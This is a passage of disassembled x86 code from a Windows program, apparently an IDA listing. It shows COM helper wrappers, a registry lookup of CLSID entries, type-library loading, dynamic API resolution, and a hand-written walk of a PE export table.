mov eax, [ebp+arg_18]
mov dword ptr [eax], 80004002h
loc_49A502: ; CODE XREF: sub_49A3B3+119�j
; sub_49A3B3+134�j ...
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+8]
xor eax, eax
jmp short locret_49A516
; ---------------------------------------------------------------------------
loc_49A511: ; CODE XREF: sub_49A3B3+29�j
mov eax, 80004005h
locret_49A516: ; CODE XREF: sub_49A3B3+3C�j
; sub_49A3B3+15C�j
leave
retn
sub_49A3B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A518 proc near ; DATA XREF: _6:off_4A23E0�o
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F578
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
and [ebp+var_2C], 0
xor eax, eax
lea edi, [ebp+var_28]
stosd
stosd
mov eax, [ebp+arg_C]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2C]
push eax
push 1
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_49A3B3
add esp, 1Ch
test eax, eax
jl short loc_49A59A
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_28]
mov [eax], ecx
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_49A627
; ---------------------------------------------------------------------------
loc_49A59A: ; CODE XREF: sub_49A518+5D�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_49A5D6
push [ebp+arg_0]
call sub_49A638
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_49A5D6
mov [ebp+arg_8], 1
push [ebp+var_1C]
call ds:dword_4A2718 ; GetModuleHandleA
test eax, eax
jnz short loc_49A5D6
push 8
push 0
push [ebp+var_1C]
call sub_49BE96
loc_49A5D6: ; CODE XREF: sub_49A518+8A�j
; sub_49A518+9C�j ...
and [ebp+var_20], 0
push offset dword_49F5DC
push offset aCocreateinstan ; "CoCreateInstance"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_20], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
push 0FFFFFFFFh
mov [ebp+var_3C], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_49A627
; ---------------------------------------------------------------------------
loc_49A615: ; DATA XREF: _5:0049F580�o
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_4993DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_49A627: ; CODE XREF: sub_49A518+7D�j
; sub_49A518+FB�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 14h
sub_49A518 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A638 proc near ; CODE XREF: sub_49A518+8F�p
; sub_49A789+8F�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0049A6A2 SIZE 0000007A BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F588
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
push offset dword_4A7098
call ds:dword_4A26C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
cmp ds:dword_4A70B0, 0
jnz short loc_49A68B
push offset aAdvapi32_dll_0 ; "ADVAPI32.DLL"
push offset aRegqueryvaluea ; "RegQueryValueA"
call sub_49AC22
pop ecx
pop ecx
mov ds:dword_4A70B0, eax
loc_49A68B: ; CODE XREF: sub_49A638+3B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_49A696
jmp short loc_49A6A2
sub_49A638 endp
; =============== S U B R O U T I N E =======================================
sub_49A696 proc near ; CODE XREF: sub_49A638+57�p
; DATA XREF: _5:0049F590�o
push offset dword_4A7098
call ds:dword_4A2754 ; RtlLeaveCriticalSection
retn
sub_49A696 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_49A638
loc_49A6A2: ; CODE XREF: sub_49A638+5C�j
push 401h
call sub_49935A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_1C], eax
mov [ebp+var_20], 400h
mov ecx, [ebp+var_20]
xor eax, eax
mov edi, [ebp+var_1C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push [ebp+arg_0]
call sub_49A71C
pop ecx
lea eax, [ebp+var_20]
push eax
push [ebp+var_1C]
push offset dword_4A6F98
push 80000000h
call ds:dword_4A70B0
test eax, eax
jnz short loc_49A6FC
mov eax, [ebp+var_1C]
jmp short loc_49A70D
; ---------------------------------------------------------------------------
loc_49A6FC: ; CODE XREF: sub_49A638+BD�j
mov eax, [ebp+var_1C]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_4993DD
pop ecx
xor eax, eax
loc_49A70D: ; CODE XREF: sub_49A638+C2�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_49A638
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A71C proc near ; CODE XREF: sub_49A638+9E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Fh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Eh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Dh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Ch]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Bh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Ah]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+9]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+8]
push eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax+6]
push eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax+4]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
push offset aClsid08x04x04x ; "CLSID\\{%08x-%04x-%04x-%02x%02x-%02x%02x"...
push offset dword_4A6F98
call ds:dword_4A27D4 ; wsprintfA
add esp, 34h
pop ebp
retn
sub_49A71C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A789 proc near ; DATA XREF: _6:004A23E8�o
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F598
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
lea eax, [ebp+var_2C]
push eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_49A3B3
add esp, 1Ch
test eax, eax
jl short loc_49A7F3
push 0FFFFFFFFh
mov eax, [ebp+var_2C]
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_49A8AF
; ---------------------------------------------------------------------------
loc_49A7F3: ; CODE XREF: sub_49A789+4D�j
and [ebp+var_20], 0
push offset dword_49F5DC
push offset aCocreateinst_0 ; "CoCreateInstanceEx"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_49A847
push [ebp+arg_0]
call sub_49A638
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_49A847
mov [ebp+arg_8], 1
push [ebp+var_1C]
call ds:dword_4A2718 ; GetModuleHandleA
test eax, eax
jnz short loc_49A847
push 8
push 0
push [ebp+var_1C]
call sub_49BE96
loc_49A847: ; CODE XREF: sub_49A789+8A�j
; sub_49A789+9C�j ...
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
mov [ebp+var_24], eax
and [ebp+var_28], 0
jmp short loc_49A86C
; ---------------------------------------------------------------------------
loc_49A865: ; CODE XREF: sub_49A789+FA�j
mov eax, [ebp+var_28]
inc eax
mov [ebp+var_28], eax
loc_49A86C: ; CODE XREF: sub_49A789+DA�j
mov eax, [ebp+var_28]
cmp eax, [ebp+arg_10]
jnb short loc_49A885
mov eax, [ebp+var_28]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
mov eax, [ecx+eax]
mov [ebp+var_30], eax
jmp short loc_49A865
; ---------------------------------------------------------------------------
loc_49A885: ; CODE XREF: sub_49A789+E9�j
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_3C], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_49A8AF
; ---------------------------------------------------------------------------
loc_49A89D: ; DATA XREF: _5:0049F5A0�o
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_4993DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_49A8AF: ; CODE XREF: sub_49A789+65�j
; sub_49A789+112�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_49A789 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A8C0 proc near ; DATA XREF: _6:004A23F0�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F5A8
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
lea eax, [ebp+var_24]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_49A31F
add esp, 18h
test eax, eax
jl short loc_49A927
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_2C], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp loc_49A9B4
; ---------------------------------------------------------------------------
loc_49A927: ; CODE XREF: sub_49A8C0+4A�j
mov eax, [ebp+arg_4]
and eax, 1
test eax, eax
jz short loc_49A963
push [ebp+arg_0]
call sub_49A638
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_49A963
mov [ebp+arg_4], 1
push [ebp+var_1C]
call ds:dword_4A2718 ; GetModuleHandleA
test eax, eax
jnz short loc_49A963
push 8
push 0
push [ebp+var_1C]
call sub_49BE96
loc_49A963: ; CODE XREF: sub_49A8C0+6F�j
; sub_49A8C0+81�j ...
and [ebp+var_20], 0
push offset dword_49F5DC
push offset aCogetclassobje ; "CoGetClassObject"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_20], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
push 0FFFFFFFFh
mov [ebp+var_30], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_49A9B4
; ---------------------------------------------------------------------------
loc_49A9A2: ; DATA XREF: _5:0049F5B0�o
mov eax, [ebp+var_1C]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_4993DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_49A9B4: ; CODE XREF: sub_49A8C0+62�j
; sub_49A8C0+E0�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 14h
sub_49A8C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49A9C5 proc near ; CODE XREF: sub_49AA34+9F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], 80070057h
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
mov eax, [ebp+arg_0]
mov eax, [eax]
push [ebp+arg_0]
call dword ptr [eax+18h]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jl short loc_49AA2F
and [ebp+var_C], 0
push offset dword_49F5F8
push offset aGetrecordinfof ; "GetRecordInfoFromTypeInfo"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_49AA28
push [ebp+arg_8]
push [ebp+var_4]
call [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+8]
jmp short loc_49AA2F
; ---------------------------------------------------------------------------
loc_49AA28: ; CODE XREF: sub_49A9C5+48�j
mov [ebp+var_8], 80004005h
loc_49AA2F: ; CODE XREF: sub_49A9C5+2A�j
; sub_49A9C5+61�j
mov eax, [ebp+var_8]
leave
retn
sub_49A9C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49AA34 proc near ; DATA XREF: _6:off_4A23F8�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 24h
push edi
mov [ebp+var_4], 80004005h
push [ebp+arg_0]
call sub_493D50
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz loc_49AAFD
and [ebp+var_10], 0
mov edi, [ebp+var_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_18], ecx
push 208h
call sub_49935A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
mov ecx, 82h
xor eax, eax
mov edi, [ebp+var_14]
rep stosd
push 104h
push [ebp+var_14]
push 0FFFFFFFFh
push [ebp+var_8]
push 0
push 0
call ds:dword_4A2770 ; MultiByteToWideChar
push offset dword_49F5F8
push offset aLoadtypelib ; "LoadTypeLib"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_14]
call [ebp+var_C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jl short loc_49AAE9
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+var_10]
call sub_49A9C5
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+var_10]
mov eax, [eax]
push [ebp+var_10]
call dword ptr [eax+8]
loc_49AAE9: ; CODE XREF: sub_49AA34+94�j
mov eax, [ebp+var_14]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_4993DD
pop ecx
mov eax, [ebp+var_4]
jmp short loc_49AB37
; ---------------------------------------------------------------------------
loc_49AAFD: ; CODE XREF: sub_49AA34+1E�j
and [ebp+var_1C], 0
push offset dword_49F5F8
push offset aGetrecordinf_0 ; "GetRecordInfoFromGuids"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_49AB32
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_1C]
jmp short loc_49AB37
; ---------------------------------------------------------------------------
loc_49AB32: ; CODE XREF: sub_49AA34+E5�j
mov eax, 80004005h
loc_49AB37: ; CODE XREF: sub_49AA34+C7�j
; sub_49AA34+FC�j
pop edi
leave
retn 18h
sub_49AA34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49AB3C proc near ; DATA XREF: _6:004A2400�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_8], 80004005h
push [ebp+arg_0]
call sub_493D50
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_49ABB5
push 208h
call sub_49935A
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov [ebp+var_10], eax
push 104h
push [ebp+var_10]
push 0FFFFFFFFh
push [ebp+var_4]
push 0
push 0
call ds:dword_4A2770 ; MultiByteToWideChar
push offset dword_49F5F8
push offset aLoadtypelib ; "LoadTypeLib"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_10]
push [ebp+var_10]
call [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
mov [ebp+var_1C], eax
push [ebp+var_1C]
call sub_4993DD
pop ecx
loc_49ABB5: ; CODE XREF: sub_49AB3C+1D�j
cmp [ebp+var_8], 0
jge short loc_49ABE4
push offset dword_49F5F8
push offset aLoadregtypelib ; "LoadRegTypeLib"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_14], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_14]
mov [ebp+var_8], eax
loc_49ABE4: ; CODE XREF: sub_49AB3C+7D�j
mov eax, [ebp+var_8]
leave
retn 14h
sub_49AB3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49ABEB proc near ; CODE XREF: sub_49AC22+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_49AC0E
push [ebp+arg_4]
call ds:dword_4A275C ; LoadLibraryA
mov [ebp+var_8], eax
loc_49AC0E: ; CODE XREF: sub_49ABEB+15�j
push [ebp+arg_0]
push [ebp+var_8]
call ds:dword_4A2728 ; GetProcAddress
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_49ABEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49AC22 proc near ; CODE XREF: sub_4968A0+16�p
; sub_49A518+CC�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_49ABEB
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_49AC4F
push ds:off_49F4F8
push 30h
push ds:off_49F4FC
call sub_49948C
loc_49AC4F: ; CODE XREF: sub_49AC22+18�j
mov eax, [ebp+var_4]
leave
retn
sub_49AC22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49AC54 proc near ; CODE XREF: sub_4208B4+5�p
; sub_4208C5+6�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jnz short loc_49AC64
mov [ebp+arg_0], offset sub_499C27
loc_49AC64: ; CODE XREF: sub_49AC54+7�j
movzx eax, ds:byte_4A70D0
test eax, eax
jnz short loc_49AC7A
push [ebp+arg_0]
call ds:dword_4A2790 ; SetUnhandledExceptionFilter
jmp short loc_49AC8A
; ---------------------------------------------------------------------------
loc_49AC7A: ; CODE XREF: sub_49AC54+19�j
push offset sub_499C27
call ds:dword_4A2790 ; SetUnhandledExceptionFilter
mov eax, offset sub_499C27
loc_49AC8A: ; CODE XREF: sub_49AC54+24�j
pop ebp
retn 4
sub_49AC54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49AC8E proc near ; CODE XREF: sub_49AD79+4B�p
; sub_49AF43+108�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
and [ebp+var_8], 0
mov eax, [ebp+arg_4]
mov eax, [eax+18h]
dec eax
mov [ebp+var_4], eax
loc_49ACA2: ; CODE XREF: sub_49AC8E:loc_49AD70�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_4]
jg loc_49AD75
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+20h]
mov eax, [ebp+var_10]
mov eax, [ecx+eax*4]
add eax, [ebp+arg_0]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_8]
mov [ebp+var_20], eax
loc_49ACD7: ; CODE XREF: sub_49AC8E+7B�j
mov eax, [ebp+var_20]
mov al, [eax]
mov [ebp+var_21], al
mov ecx, [ebp+var_1C]
cmp al, [ecx]
jnz short loc_49AD11
cmp [ebp+var_21], 0
jz short loc_49AD0B
mov eax, [ebp+var_20]
mov al, [eax+1]
mov [ebp+var_22], al
mov ecx, [ebp+var_1C]
cmp al, [ecx+1]
jnz short loc_49AD11
add [ebp+var_20], 2
add [ebp+var_1C], 2
cmp [ebp+var_22], 0
jnz short loc_49ACD7
loc_49AD0B: ; CODE XREF: sub_49AC8E+5C�j
and [ebp+var_28], 0
jmp short loc_49AD19
; ---------------------------------------------------------------------------
loc_49AD11: ; CODE XREF: sub_49AC8E+56�j
; sub_49AC8E+6D�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_28], eax
loc_49AD19: ; CODE XREF: sub_49AC8E+81�j
mov eax, [ebp+var_28]
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_49AD5A
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+24h]
mov eax, [ebp+var_10]
mov ax, [ecx+eax*2]
mov [ebp+var_18], ax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+1Ch]
movzx eax, [ebp+var_18]
mov eax, [ecx+eax*4]
add eax, [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
jmp short locret_49AD77
; ---------------------------------------------------------------------------
loc_49AD5A: ; CODE XREF: sub_49AC8E+9B�j
cmp [ebp+var_C], 0
jle short loc_49AD69
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_8], eax
jmp short loc_49AD70
; ---------------------------------------------------------------------------
loc_49AD69: ; CODE XREF: sub_49AC8E+D0�j
mov eax, [ebp+var_10]
dec eax
mov [ebp+var_4], eax
loc_49AD70: ; CODE XREF: sub_49AC8E+D9�j
jmp loc_49ACA2
; ---------------------------------------------------------------------------
loc_49AD75: ; CODE XREF: sub_49AC8E+1A�j
xor eax, eax
locret_49AD77: ; CODE XREF: sub_49AC8E+CA�j
leave
retn
sub_49AC8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49AD79 proc near ; CODE XREF: sub_498494+97�p
; sub_498494+C5�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
push [ebp+arg_4]
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_49AD9D
push [ebp+arg_4]
call ds:dword_4A275C ; LoadLibraryA
mov [ebp+var_14], eax
loc_49AD9D: ; CODE XREF: sub_49AD79+16�j
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov ecx, [ebp+var_C]
add ecx, [eax+3Ch]
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
add ecx, [eax+78h]
mov [ebp+var_4], ecx
push [ebp+arg_0]
push [ebp+var_4]
push [ebp+var_C]
call sub_49AC8E
add esp, 0Ch
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
leave
retn
sub_49AD79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49ADD4 proc near ; CODE XREF: sub_495DC0+12�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2Ch
push offset dword_4A70B8
call ds:dword_4A274C ; InitializeCriticalSection
push offset dword_4A7098
call ds:dword_4A274C ; InitializeCriticalSection
push 28h
call sub_49935A
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_49AE13
push 83h
mov ecx, [ebp+var_8]
call sub_49C77C
mov [ebp+var_1C], eax
jmp short loc_49AE17
; ---------------------------------------------------------------------------
loc_49AE13: ; CODE XREF: sub_49ADD4+2B�j
and [ebp+var_1C], 0
loc_49AE17: ; CODE XREF: sub_49ADD4+3D�j
mov eax, [ebp+var_1C]
mov ds:dword_4A70D4, eax
push 28h
call sub_49935A
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_49AE3F
push 9
mov ecx, [ebp+var_C]
call sub_49C77C
mov [ebp+var_20], eax
jmp short loc_49AE43
; ---------------------------------------------------------------------------
loc_49AE3F: ; CODE XREF: sub_49ADD4+5A�j
and [ebp+var_20], 0
loc_49AE43: ; CODE XREF: sub_49ADD4+69�j
mov eax, [ebp+var_20]
mov ds:dword_4A70D8, eax
push 28h
call sub_49935A
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_49AE6B
push 9
mov ecx, [ebp+var_10]
call sub_49C77C
mov [ebp+var_24], eax
jmp short loc_49AE6F
; ---------------------------------------------------------------------------
loc_49AE6B: ; CODE XREF: sub_49ADD4+86�j
and [ebp+var_24], 0
loc_49AE6F: ; CODE XREF: sub_49ADD4+95�j
mov eax, [ebp+var_24]
mov ds:dword_4A294C, eax
push 28h
call sub_49935A
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_49AE97
push 9
mov ecx, [ebp+var_14]
call sub_49C77C
mov [ebp+var_28], eax
jmp short loc_49AE9B
; ---------------------------------------------------------------------------
loc_49AE97: ; CODE XREF: sub_49ADD4+B2�j
and [ebp+var_28], 0
loc_49AE9B: ; CODE XREF: sub_49ADD4+C1�j
mov eax, [ebp+var_28]
mov ds:dword_4A2954, eax
push 28h
call sub_49935A
pop ecx
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_49AEC3
push 9
mov ecx, [ebp+var_18]
call sub_49C77C
mov [ebp+var_2C], eax
jmp short loc_49AEC7
; ---------------------------------------------------------------------------
loc_49AEC3: ; CODE XREF: sub_49ADD4+DE�j
and [ebp+var_2C], 0
